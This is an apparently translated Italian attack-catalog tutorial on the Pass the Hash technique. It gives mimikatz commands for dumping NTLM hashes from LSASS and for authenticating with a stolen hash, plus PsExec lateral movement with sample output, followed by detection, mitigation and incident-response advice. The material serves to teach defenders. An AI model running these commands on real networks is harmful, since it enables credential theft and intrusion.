Attacco Pass the Hash

Tutorial sull'attacco: Come funziona un attacco Pass the Hash

PASSO 1: Rubare gli hash delle password

An adversary who has gained a foothold in a network can use any of multiple methods to obtain password hashes, including DCSync attacks and extracting hashes from NTDS.dit. Another method, shown below, is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. Note that this technique requires the adversary to have compromised administrative privileges to the computer (e.g., by enticing a user who is an administrator on the workstation to open a phishing email).

      PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"

Authentication Id : 0 ; 302247 (00000000:00049ca7)

Session: RemoteInteractive from 2

User Name: joed

Domain: DOMAIN

Logon Server: DC1

Logon Time: 09/07/2020 10:31:19

SID: S-1-5-21-3501040295-3816137123-30697657-1109

msv :

[00000003] Primary

* Username : joed

* Domain: DOMAIN

* NTLM: eed224b4784bb040aab50b8856fe9f02

* SHA1: 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b

* DPAPI: e75e04767f812723a24f7e6d91840c1d

tspkg :

wdigest :

* Username : joed

* Domain: DOMAIN

* Password : (null)

kerberos :

* Username : joed

* Domain: domain.com

* Password : (null)

ssp :

credman :

      

PASSAGGIO 2: Autenticazione tramite un hash di password rubato

Successivamente, l'avversario utilizza uno degli hash delle password rubate per autenticarsi come utente utilizzando la tecnica Pass the Hash. L'esempio sottostante dimostra l'uso dell'hash della password rubata per avviare cmd.exe; è anche possibile passare l'hash direttamente attraverso la rete a qualsiasi risorsa accessibile che permetta l'autenticazione NTLM.

Per passare l'hash utilizzando mimikatz sekurlsa::pth, vengono specificati i seguenti parametri:

      


/user: — The compromised user’s username

/domain: — The FQDN of the domain (if using a domain account) or “.” (if using a local account)

/ntlm:, /aes128: or /aes256: — The stolen NTLM, AES-128 or AES-256 password hash

PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"

user: JoeD

domain: domain.com

program : cmd.exe

impers. : no

NTLM: eed224b4784bb040aab50b8856fe9f02

| PID11560

|TID10044

|LSA Process is now R/W

|LUID 0 ; 58143370 (00000000:0377328a)

\_ msv1_0- data copy @ 000001AE3DDE8A30 : OK !

\_ kerberos - data copy @ 000001AE3DECE9E8

\_ aes256_hmac-> null

\_ aes128_hmac-> null

\_ rc4_hmac_ntOK

\_ rc4_hmac_oldOK

\_ rc4_md4OK

\_ rc4_hmac_nt_expOK

\_ rc4_hmac_old_expOK

\_ *Password replace @ 000001AE3DFEC428 (32) -> null

# New CMD Window Opens
      

PASSO 3: Accedi ad altre risorse

Infine, l'avversario può utilizzare i privilegi appena acquisiti per perseguire i propri obiettivi. L'esempio sottostante mostra come possono usare lo strumento PSExec per eseguire comandi su sistemi remoti al fine di espandere la loro presenza e ripetere il ciclo di furto delle credenziali e movimento laterale su un numero sempre maggiore di sistemi.

      


PS> .\PSExec.exe \\server1 cmd.exe

PsExec v2.2 - Execute processes remotely

Copyright (C) 2001-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.17763.1282]

(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname

server1
      

Rileva, Mitiga e Rispondi

Rileva

Difficoltà: Difficile

Poiché l'autenticazione NTLM viene elaborata da ogni workstation e server, il pass-the-hash può essere difficile da rilevare per le organizzazioni, in quanto ogni endpoint deve essere monitorato per attività sospette.

• Monitorare le autenticazioni NTLM (in particolare per le connessioni remote) per rilevare cambiamenti nei modelli di comportamento degli utenti, ad esempio: un utente che accede a un numero maggiore di endpoint rispetto al normale; oppure, un utente che accede agli endpoint per la prima volta.
• Per estrarre gli hash dal processo LSASS.exe di un endpoint, il malware dovrebbe ottenere un handle con i privilegi PROCESS_VM_OPERATION e PROCESS_VM_WRITE. Le soluzioni di Endpoint Detection and Response possono monitorare i processi che creano handle sospetti.
• Estrarre hash da Active Directory richiede privilegi amministrativi e l'uso di altre tecniche come DCSync e l'estrazione di hash da NTDS.dit. Il rilevamento di queste tecniche è discusso nelle loro pagine del Catalogo degli Attacchi.

Mitigare

Difficoltà: Difficile

Poiché l'abuso di pass-the-hash sfrutta le funzionalità del protocollo NTLM, non può essere completamente eliminato. Tuttavia, esistono soluzioni che possono rendere più difficile per gli avversari compromettere gli hash o limitare la loro capacità di utilizzare tali hash per muoversi lateralmente.

• Abilita il Windows Defender Credential Guard di Microsoft. Introdotto in Windows 10 e Windows Server 2016, Credential Guard si basa sulla virtualizzazione per proteggere l'archiviazione delle credenziali e permettere solo ai processi affidabili di accedervi.
• Rimuovi i privilegi di amministratore degli utenti dalle loro postazioni di lavoro, limitando la capacità di un avversario di eseguire malware e rimuovendo i privilegi necessari per estrarre hash da LSASS.exe.
• Non consentire agli utenti di possedere privilegi amministrativi su un gran numero di endpoint. Ciò riduce notevolmente il valore di una credenziale per un avversario che cerca di utilizzarla per movimenti laterali.
• Non consentire agli utenti di possedere privilegi amministrativi attraverso i confini di sicurezza. Ciò riduce notevolmente il rischio che credenziali compromesse possano essere utilizzate da un avversario per aumentare i privilegi.
• Randomizza e memorizza le password degli amministratori locali utilizzando una soluzione come Microsoft's Local Administrator Password Solution (LAPS). Questo riduce la capacità di un avversario di muoversi lateralmente con account locali che condividono la stessa password.
• Non consentire agli account locali di autenticarsi sulla rete. Ciò riduce la capacità di un avversario di muoversi lateralmente con account locali che condividono la stessa password. Due nuovi well-known SIDS sono stati aggiunti in Windows 8.1 e Windows 2012R2 e possono essere utilizzati nelle politiche di gruppo a questo scopo. Il SID S-1-5-113 si applicherà a qualsiasi account locale, mentre il SID S-1-5-114 si applicherà a qualsiasi account locale che è anche membro del gruppo degli Amministratori locali.
• Aggiungi gli account di dominio privilegiati al gruppo Protected Users per ridurre i rischi di furto delle credenziali.
• Configurare un firewall basato sull'host (come Windows Defender Firewall) per controllare e limitare quali host possono comunicare con altri. Ad esempio, nella maggior parte degli ambienti, le postazioni di lavoro hanno poco bisogno di comunicare direttamente con altre postazioni di lavoro. Utilizzare un firewall basato sull'host per bloccare questo traffico può limitare il movimento laterale.

Rispondi

Difficoltà: Media

Se rilevi un possibile utilizzo di Pass the Hash, intraprendi immediatamente le seguenti azioni:

• Attiva il processo di risposta agli incidenti e allerta il team di risposta.
• Reimposta la password per l'utente compromesso, rendendo così non valido l'hash della password rubata.
• Mettete in quarantena le macchine impattate per indagini forensi e attività di eradicazione e recupero. Analizzate i log per determinare se questo computer è il paziente zero o se l'attaccante ha deviato su questa macchina da un altro luogo, così come se l'attaccante ha deviato da questa macchina verso un'altra.